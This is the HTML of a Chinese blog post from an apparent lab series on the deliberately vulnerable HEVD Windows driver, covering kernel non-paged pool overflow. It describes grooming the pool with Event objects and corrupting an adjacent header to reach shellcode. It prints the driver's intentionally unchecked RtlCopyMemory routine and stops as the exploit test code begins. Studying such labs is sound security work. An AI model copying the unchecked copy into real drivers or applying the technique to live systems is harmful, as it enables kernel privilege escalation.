<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  

  
    
      
    

    
  

  
    
    
    <link href="https://fonts.cat.net/css?family=Lato:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Roboto Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.jpg?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.jpg?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.jpg?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Pool Overflow,">










<meta name="description" content="0x00 &amp;#x524D;&amp;#x8A00;&amp;#x8FD9;&amp;#x4E00;&amp;#x7BC7;&amp;#xFF0C;&amp;#x6211;&amp;#x4EEC;&amp;#x7EE7;&amp;#x7EED;&amp;#x7814;&amp;#x7A76;&amp;#x4E00;&amp;#x79CD;&amp;#x65B0;&amp;#x7684;&amp;#x6F0F;&amp;#x6D1E;&amp;#x7C7B;&amp;#x578B;&amp;#xFF0C;&amp;#x5185;&amp;#x6838;&amp;#x6C60;&amp;#x">
<meta name="keywords" content="Pool Overflow">
<meta property="og:type" content="article">
<meta property="og:title" content="[06] HEVD 内核漏洞之池溢出">
<meta property="og:url" content="https://saturn35.github.io/2019/08/03/20190803-1/index.html">
<meta property="og:site_name" content="Saturn35">
<meta property="og:description" content="0x00 &amp;#x524D;&amp;#x8A00;&amp;#x8FD9;&amp;#x4E00;&amp;#x7BC7;&amp;#xFF0C;&amp;#x6211;&amp;#x4EEC;&amp;#x7EE7;&amp;#x7EED;&amp;#x7814;&amp;#x7A76;&amp;#x4E00;&amp;#x79CD;&amp;#x65B0;&amp;#x7684;&amp;#x6F0F;&amp;#x6D1E;&amp;#x7C7B;&amp;#x578B;&amp;#xFF0C;&amp;#x5185;&amp;#x6838;&amp;#x6C60;&amp;#x">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/1.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/2.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/3.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/4.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/5.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/6.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/7.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/8.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/9.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/10.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/11.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/12.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/13.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/14.png">
<meta property="og:image" content="https://saturn35.github.io/2019/08/03/20190803-1/15.gif">
<meta property="og:updated_time" content="2019-12-28T05:22:34.258Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="[06] HEVD 内核漏洞之池溢出">
<meta name="twitter:description" content="0x00 &amp;#x524D;&amp;#x8A00;&amp;#x8FD9;&amp;#x4E00;&amp;#x7BC7;&amp;#xFF0C;&amp;#x6211;&amp;#x4EEC;&amp;#x7EE7;&amp;#x7EED;&amp;#x7814;&amp;#x7A76;&amp;#x4E00;&amp;#x79CD;&amp;#x65B0;&amp;#x7684;&amp;#x6F0F;&amp;#x6D1E;&amp;#x7C7B;&amp;#x578B;&amp;#xFF0C;&amp;#x5185;&amp;#x6838;&amp;#x6C60;&amp;#x">
<meta name="twitter:image" content="https://saturn35.github.io/2019/08/03/20190803-1/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://saturn35.github.io/2019/08/03/20190803-1/">






  <title>[06] HEVD 内核漏洞之池溢出 | Saturn35</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Saturn35</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>




 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://saturn35.github.io/2019/08/03/20190803-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Saturn35">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/head.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Saturn35">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">[06] HEVD 内核漏洞之池溢出</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-08-03T21:34:09+08:00">
                2019-08-03
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/08/03/20190803-1/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2019/08/03/20190803-1/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3,215
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  16
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h5 id="0x00-&#x524D;&#x8A00;"><a href="#0x00-&#x524D;&#x8A00;" class="headerlink" title="0x00 &#x524D;&#x8A00;"></a>0x00 &#x524D;&#x8A00;</h5><p>&#x8FD9;&#x4E00;&#x7BC7;&#xFF0C;&#x6211;&#x4EEC;&#x7EE7;&#x7EED;&#x7814;&#x7A76;&#x4E00;&#x79CD;&#x65B0;&#x7684;&#x6F0F;&#x6D1E;&#x7C7B;&#x578B;&#xFF0C;&#x5185;&#x6838;&#x6C60;&#x6EA2;&#x51FA;&#x3002;&#x6DF1;&#x5165;&#x63A2;&#x8BA8;&#x6C60;&#x6EA2;&#x51FA;&#x8FD9;&#x4E2A;&#x4E3B;&#x9898;&#x524D;, &#x6211;&#x4EEC;&#x9700;&#x8981;&#x5148;&#x4E86;&#x89E3;&#x4E0B;&#x6C60;&#x7684;&#x57FA;&#x672C;&#x6982;&#x5FF5;, &#x6709;&#x4E00;&#x5B9A;&#x7684;&#x5185;&#x6838;&#x6C60;&#x57FA;&#x672C;&#x77E5;&#x8BC6;&#xFF0C;&#x624D;&#x77E5;&#x9053;&#x5982;&#x4F55;&#x6839;&#x636E;&#x9700;&#x8981;&#x64CD;&#x7EB5;&#x5B83;&#x3002;&#x6C60;&#x6EA2;&#x51FA;&#x76F8;&#x8F83;&#x4E8E;&#x4E4B;&#x524D;&#x7684;&#x6F0F;&#x6D1E;&#x7C7B;&#x578B;&#xFF0C;&#x6BD4;&#x8F83;&#x96BE;&#x4EE5;&#x7406;&#x89E3;&#xFF0C;ok,&#x51C6;&#x5907;&#x5F00;&#x59CB;&#x3002;</p>
<p>&#x76F8;&#x5173;&#x50A8;&#x5907;&#x6587;&#x7AE0;&#xFF1A;</p>
<ul>
<li><a href="http://www.mista.nu/research/MANDT-kernelpool-PAPER.pdf" target="_blank" rel="noopener">Kernel Pool Exploitation on Windows 7 [Tarjei Mandt]</a></li>
<li><a href="https://saturn35.github.io/2019/07/22/&#x7FFB;&#x8BD1;-Kernel-Pool-Exploitation-on-Windows-7-By-Tarjei-Mandt/">Kernel Pool Exploitation on Windows 7&#x4E2A;&#x4EBA;&#x6574;&#x7406;&#x673A;&#x7FFB;&#x7248;==</a></li>
<li><a href="https://blogs.msdn.microsoft.com/ntdebugging/2013/06/14/understanding-pool-corruption-part-1-buffer-overflows/" target="_blank" rel="noopener">Understanding Pool Corruption Part 1 &#x2013; Buffer Overflows</a></li>
<li><a href="https://blogs.msdn.microsoft.com/ntdebugging/2013/08/22/understanding-pool-corruption-part-2-special-pool-for-buffer-overruns/" target="_blank" rel="noopener">Understanding Pool Corruption Part 2 &#x2013; Special Pool for Buffer Overruns</a></li>
<li><a href="https://blogs.msdn.microsoft.com/ntdebugging/2013/12/31/understanding-pool-corruption-part-3-special-pool-for-double-frees/" target="_blank" rel="noopener">Understanding Pool Corruption Part 3 &#x2013; Special Pool for Double Frees</a></li>
<li><a href="https://saturn35.github.io/2019/07/23/&#x7FFB;&#x8BD1;-&#x5185;&#x6838;&#x6C60;&#x57FA;&#x7840;&#x77E5;&#x8BC6;&#xFF08;&#x6C60;&#x635F;&#x574F;&#xFF09;/">Understanding Pool Corruption &#x4E2A;&#x4EBA;&#x6574;&#x7406;&#x673A;&#x7FFB;&#x7248;</a></li>
</ul>
<p>&#x5B9E;&#x9A8C;&#x73AF;&#x5883;&#xFF1A;Win10&#x4E13;&#x4E1A;&#x7248;+VMware Workstation 15 Pro+Win7 x86 sp1</p>
<p>&#x5B9E;&#x9A8C;&#x5DE5;&#x5177;&#xFF1A;VS2015+Windbg+KmdManager+DbgViewer</p>
<h5 id="0x01&#x6F0F;&#x6D1E;&#x539F;&#x7406;"><a href="#0x01&#x6F0F;&#x6D1E;&#x539F;&#x7406;" class="headerlink" title="0x01&#x6F0F;&#x6D1E;&#x539F;&#x7406;"></a>0x01&#x6F0F;&#x6D1E;&#x539F;&#x7406;</h5><h6 id="&#x6C60;&#x98CE;&#x6C34;"><a href="#&#x6C60;&#x98CE;&#x6C34;" class="headerlink" title="&#x6C60;&#x98CE;&#x6C34;"></a><strong>&#x6C60;&#x98CE;&#x6C34;</strong></h6><p>&#x5185;&#x6838;&#x6C60;&#x7C7B;&#x4F3C;&#x4E8E;Windows &#x4E2D;&#x7684;&#x5806;, &#x56E0;&#x4E3A;&#x5B83;&#x7684;&#x4F5C;&#x7528;&#x4E5F;&#x662F;&#x7528;&#x6765;&#x52A8;&#x6001;&#x5206;&#x914D;&#x5185;&#x5B58;&#x3002; &#x50CF;&#x5806;&#x55B7;&#x5C04;&#x4FEE;&#x6539;&#x6B63;&#x5E38;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x7684;&#x5806;&#x4E00;&#x6837;&#xFF0C;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x5728;&#x5185;&#x6838;&#x9886;&#x57DF;&#x627E;&#x5230;&#x4E00;&#x79CD;&#x529E;&#x6CD5;&#x6765;&#x4FEE;&#x6539;&#x5185;&#x5B58;&#x6C60;&#xFF0C;&#x4EE5;&#x4FBF;&#x5728;&#x5185;&#x5B58;&#x533A;&#x57DF;&#x7CBE;&#x786E;&#x5730;&#x8C03;&#x7528;&#x6211;&#x4EEC;&#x7684;shellcode&#x3002; &#x7406;&#x89E3;&#x5185;&#x5B58;&#x5206;&#x914D;&#x5668;&#x7684;&#x6982;&#x5FF5;&#x4EE5;&#x53CA;&#x5982;&#x4F55;&#x5F71;&#x54CD;&#x6C60;&#x5206;&#x914D;&#x548C;&#x91CA;&#x653E;&#x673A;&#x5236;&#x76F8;&#x5F53;&#x91CD;&#x8981;&#x3002;</p>
<p>&#x5728;&#x6211;&#x4EEC;&#x7684;HEVD&#x9A71;&#x52A8;&#x4E2D;&#xFF0C;&#x6709;&#x6F0F;&#x6D1E;&#x7684;&#x7528;&#x6237;&#x7F13;&#x51B2;&#x533A;&#x88AB;&#x5206;&#x914D;&#x5728;&#x975E;&#x5206;&#x9875;&#x6C60;&#xFF0C;&#x6211;&#x4EEC;&#x4E5F;&#x9700;&#x8981;&#x627E;&#x5230;&#x4E00;&#x79CD;&#x65B9;&#x6CD5;&#x6765;&#x4FEE;&#x6539;&#x975E;&#x5206;&#x9875;&#x6C60;&#x3002;Windows&#x63D0;&#x4F9B;&#x4E86;Event&#x5BF9;&#x8C61;&#xFF0C;&#x8BE5;&#x5BF9;&#x8C61;&#x5B58;&#x50A8;&#x4E0E;&#x975E;&#x5206;&#x9875;&#x6C60;&#x4E2D;&#xFF0C;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;CreateEvent API&#x6765;&#x8FDB;&#x884C;&#x521B;&#x5EFA;&#xFF1A;</p>
<p>``</p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">HANDLE WINAPI CreateEvent(</span><br><span class="line">  _In_opt_ LPSECURITY_ATTRIBUTES lpEventAttributes,</span><br><span class="line">  _In_     <span class="keyword">BOOL </span>                 <span class="keyword">bManualReset,</span></span><br><span class="line"><span class="keyword"> </span> _In_     <span class="keyword">BOOL </span>                 <span class="keyword">bInitialState,</span></span><br><span class="line"><span class="keyword"> </span> _In_opt_ LPCTSTR               lpName</span><br><span class="line">)<span class="comment">;</span></span><br></pre></td></tr></table></figure>

<p>&#x8FD9;&#x91CC;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x7528;&#x8FD9;&#x4E2A;API&#x521B;&#x5EFA;<strong>&#x4E24;&#x4E2A;&#x8DB3;&#x591F;&#x5927;&#x7684;Event&#x5BF9;&#x8C61;&#x6570;&#x7EC4;</strong>&#xFF0C;&#x7136;&#x540E;&#x901A;&#x8FC7;&#x4F7F;&#x7528;CloseHandle API &#x91CA;&#x653E;<strong>&#x67D0;&#x4E9B;</strong>Event &#x5BF9;&#x8C61;&#xFF0C;&#x4ECE;&#x800C;<strong>&#x5728;&#x5206;&#x914D;&#x7684;&#x6C60;&#x5757;&#x4E2D;&#x9020;&#x6210;&#x7A7A;&#x9699;&#xFF0C;&#x7ECF;&#x5408;&#x5E76;&#x5F62;&#x6210;&#x66F4;&#x5927;&#x7684;&#x7A7A;&#x95F2;&#x5757;</strong>:</p>
<figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">HRESULT CloseHandle(</span><br><span class="line">   HANDLE hHandle </span><br><span class="line">)<span class="comment">;</span></span><br></pre></td></tr></table></figure>

<p><code>&#x5728;&#x8FD9;&#x4E9B;&#x7A7A;&#x95F2;&#x5757;&#x4E2D;&#xFF0C;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x5C06;&#x6709;&#x6F0F;&#x6D1E;&#x7684;&#x7528;&#x6237;&#x7F13;&#x51B2;&#x533A;&#x63D2;&#x8FDB;&#x53BB;&#xFF0C;&#x4EE5;&#x4FBF;&#x6BCF;&#x6B21;&#x51C6;&#x786E;&#x5730;&#x8986;&#x76D6;&#x6B63;&#x786E;&#x7684;&#x5185;&#x5B58;&#x4F4D;&#x7F6E;&#x3002;&#x56E0;&#x4E3A;&#x6211;&#x4EEC;&#x4F1A;&#x7834;&#x574F;Event&#x5BF9;&#x8C61;&#x7684;&#x76F8;&#x90BB;&#x5934;&#x90E8;&#xFF0C;&#x4EE5;&#x4FBF;&#x8DF3;&#x8F6C;&#x5230;&#x5305;&#x542B;shellcode&#x7684;&#x5730;&#x5740;&#x3002;</code>&#x4E4B;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x4F1A;&#x628A;&#x6307;&#x9488;&#x6307;&#x5411;shellcode&#xFF0C;&#x8FD9;&#x6837;&#x5C31;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;&#x64CD;&#x7EB5;&#x635F;&#x574F;&#x7684;&#x6C60;&#x5934;&#x90E8;&#x6765;&#x8C03;&#x7528;&#x5B83;&#x3002; &#x6211;&#x4EEC;&#x4F2A;&#x9020;&#x4E00;&#x4E2A;OBJECT_TYPE&#x5934;&#xFF0C;&#x8986;&#x76D6;&#x6307;&#x5411;OBJECT_TYPE_INITIALIZER&#x4E2D;&#x7684;&#x4E00;&#x4E2A;&#x8FC7;&#x7A0B;&#x7684;&#x6307;&#x9488;&#x3002;</p>
<h6 id="&#x5206;&#x6790;"><a href="#&#x5206;&#x6790;" class="headerlink" title="&#x5206;&#x6790;"></a><strong>&#x5206;&#x6790;</strong></h6><p>&#x6253;&#x5F00;&#x9A71;&#x52A8;&#x6E90;&#x7801;&#xFF0C;&#x770B;&#x5230;&#x6F0F;&#x6D1E;&#x51FD;&#x6570;TriggerBufferOverflowNonPagedPool&#xFF1A;</p>
<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line">NTSTATUS TriggerBufferOverflowNonPagedPool(<span class="variable">_In_</span> PVOID UserBuffer,<span class="variable">_In_</span> SIZE_T <span class="built_in">Size</span>){</span><br><span class="line">    PVOID KernelBuffer = NULL;</span><br><span class="line">    NTSTATUS Status = STATUS_SUCCESS;</span><br><span class="line">    PAGED_CODE();</span><br><span class="line">    <span class="variable">__try</span></span><br><span class="line">    {</span><br><span class="line">        DbgPrint(<span class="string">&quot;[+] Allocating Pool chunk\n&quot;</span>);</span><br><span class="line">        <span class="comment">//</span></span><br><span class="line">        <span class="comment">// Allocate Pool chunk</span></span><br><span class="line">        <span class="comment">//</span></span><br><span class="line">        KernelBuffer = ExAllocatePoolWithTag(</span><br><span class="line">            NonPagedPool,</span><br><span class="line">            (SIZE_T)POOL_BUFFER_SIZE,</span><br><span class="line">            (ULONG)POOL_TAG</span><br><span class="line">        );</span><br><span class="line">        <span class="keyword">if</span> (!KernelBuffer)</span><br><span class="line">        {</span><br><span class="line">            <span class="comment">//</span></span><br><span class="line">            <span class="comment">// Unable to allocate Pool chunk</span></span><br><span class="line">            <span class="comment">//</span></span><br><span class="line">            DbgPrint(<span class="string">&quot;[-] Unable to allocate Pool chunk\n&quot;</span>);</span><br><span class="line">            Status = STATUS_NO_MEMORY;</span><br><span class="line">            return Status;</span><br><span class="line">        }</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        {</span><br><span class="line">            DbgPrint(<span class="string">&quot;[+] Pool Tag: %s\n&quot;</span>, STRINGIFY(POOL_TAG));</span><br><span class="line">            DbgPrint(<span class="string">&quot;[+] Pool Type: %s\n&quot;</span>, STRINGIFY(NonPagedPool));</span><br><span class="line">            DbgPrint(<span class="string">&quot;[+] Pool Size: 0x%X\n&quot;</span>, (SIZE_T)POOL_BUFFER_SIZE);</span><br><span class="line">            DbgPrint(<span class="string">&quot;[+] Pool Chunk: 0x%p\n&quot;</span>, KernelBuffer);</span><br><span class="line">        }</span><br><span class="line">        <span class="comment">//</span></span><br><span class="line">        <span class="comment">// Verify if the buffer resides in user mode</span></span><br><span class="line">        <span class="comment">//</span></span><br><span class="line">        ProbeForRead(UserBuffer, (SIZE_T)POOL_BUFFER_SIZE, (ULONG)<span class="variable">__alignof</span>(UCHAR));</span><br><span class="line">        DbgPrint(<span class="string">&quot;[+] UserBuffer: 0x%p\n&quot;</span>, UserBuffer);</span><br><span class="line">        DbgPrint(<span class="string">&quot;[+] UserBuffer Size: 0x%X\n&quot;</span>, <span class="built_in">Size</span>);</span><br><span class="line">        DbgPrint(<span class="string">&quot;[+] KernelBuffer: 0x%p\n&quot;</span>, KernelBuffer);</span><br><span class="line">        DbgPrint(<span class="string">&quot;[+] KernelBuffer Size: 0x%X\n&quot;</span>, (SIZE_T)POOL_BUFFER_SIZE);</span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> SECURE</span></span><br><span class="line">        <span class="comment">//</span></span><br><span class="line">        <span class="comment">// Secure Note: This is secure because the developer is passing a size</span></span><br><span class="line">        <span class="comment">// equal to size of the allocated pool chunk to RtlCopyMemory()/memcpy().</span></span><br><span class="line">        <span class="comment">// Hence, there will be no overflow</span></span><br><span class="line">        <span class="comment">//</span></span><br><span class="line">        RtlCopyMemory(KernelBuffer, UserBuffer, (SIZE_T)POOL_BUFFER_SIZE);</span><br><span class="line"><span class="meta">#<span class="meta-keyword">else</span></span></span><br><span class="line">        DbgPrint(<span class="string">&quot;[+] Triggering Buffer Overflow in NonPagedPool\n&quot;</span>);</span><br><span class="line">        <span class="comment">//</span></span><br><span class="line">        <span class="comment">// Vulnerability Note: This is a vanilla pool buffer overflow vulnerability</span></span><br><span class="line">        <span class="comment">// because the developer is passing the user supplied value directly to</span></span><br><span class="line">        <span class="comment">// RtlCopyMemory()/memcpy() without validating if the size is greater or</span></span><br><span class="line">        <span class="comment">// equal to the size of the allocated Pool chunk</span></span><br><span class="line">        <span class="comment">//</span></span><br><span class="line">        RtlCopyMemory(KernelBuffer, UserBuffer, <span class="built_in">Size</span>);</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">        <span class="keyword">if</span> (KernelBuffer)</span><br><span class="line">        {</span><br><span class="line">            DbgPrint(<span class="string">&quot;[+] Freeing Pool chunk\n&quot;</span>);</span><br><span class="line">            DbgPrint(<span class="string">&quot;[+] Pool Tag: %s\n&quot;</span>, STRINGIFY(POOL_TAG));</span><br><span class="line">            DbgPrint(<span class="string">&quot;[+] Pool Chunk: 0x%p\n&quot;</span>, KernelBuffer);</span><br><span class="line">            <span class="comment">//</span></span><br><span class="line">            <span class="comment">// Free the allocated Pool chunk</span></span><br><span class="line">            <span class="comment">//</span></span><br><span class="line">            ExFreePoolWithTag(KernelBuffer, (ULONG)POOL_TAG);</span><br><span class="line">            KernelBuffer = NULL;</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">    <span class="variable">__except</span> (EXCEPTION_EXECUTE_HANDLER)</span><br><span class="line">    {</span><br><span class="line">        Status = GetExceptionCode();</span><br><span class="line">        DbgPrint(<span class="string">&quot;[-] Exception Code: 0x%X\n&quot;</span>, Status);</span><br><span class="line">    }</span><br><span class="line">    return Status;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>&#x53EF;&#x4EE5;&#x770B;&#x5230;&#xFF0C;&#x539F;&#x56E0;&#x548C;&#x6808;&#x6EA2;&#x51FA;&#x5982;&#x51FA;&#x4E00;&#x8F99;&#xFF0C;&#x76F4;&#x63A5;&#x4F7F;&#x7528;&#x7528;&#x6237;&#x4F20;&#x6765;&#x7684;&#x7F13;&#x51B2;&#x533A;&#x5927;&#x5C0F;&#x800C;&#x4E0D;&#x662F;&#x5185;&#x6838;&#x7F13;&#x51B2;&#x533A;&#x5927;&#x5C0F;&#x8FDB;&#x884C;&#x62F7;&#x8D1D;&#x3002;&#x7528;&#x6237;&#x7F13;&#x51B2;&#x533A;&#x6570;&#x636E;&#x8FC7;&#x5927;&#xFF0C;&#x6EA2;&#x51FA;&#x5230;&#x5185;&#x6838;&#x6C60;&#x6BD7;&#x90BB;&#x7684;&#x6C60;&#x5757;&#x3002;IDA&#x4E2D;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x770B;&#x5230;&#xFF1A;</p>
<p><img src="/2019/08/03/20190803-1/1.png" alt="img"></p>
<p>&#x7533;&#x8BF7;&#x6807;&#x8BB0;&#x4E3A;&#x201C;Hack&#x201D;&#x7684;&#x7F13;&#x51B2;&#x533A;&#xFF0C;&#x957F;&#x5EA6;0x1f8&#x5373;504B&#xFF0C;&#x540E;&#x9762;&#x6211;&#x4EEC;&#x5C06;&#x5F00;&#x59CB;&#x8FDB;&#x884C;&#x5229;&#x7528;&#x3002;</p>
<h5 id="0x02&#x6F0F;&#x6D1E;&#x5229;&#x7528;"><a href="#0x02&#x6F0F;&#x6D1E;&#x5229;&#x7528;" class="headerlink" title="0x02&#x6F0F;&#x6D1E;&#x5229;&#x7528;"></a>0x02&#x6F0F;&#x6D1E;&#x5229;&#x7528;</h5><p>&#x9006;&#x5411;&#x5F97;&#x5230;IOCTL&#x4E3A;0x22200f&#x3002;&#x6211;&#x4EEC;&#x5199;&#x4E00;&#x4E2A;&#x5C0F;&#x6D4B;&#x8BD5;&#x4EE3;&#x7801;&#x5982;&#x4E0B;&#xFF1A;</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span 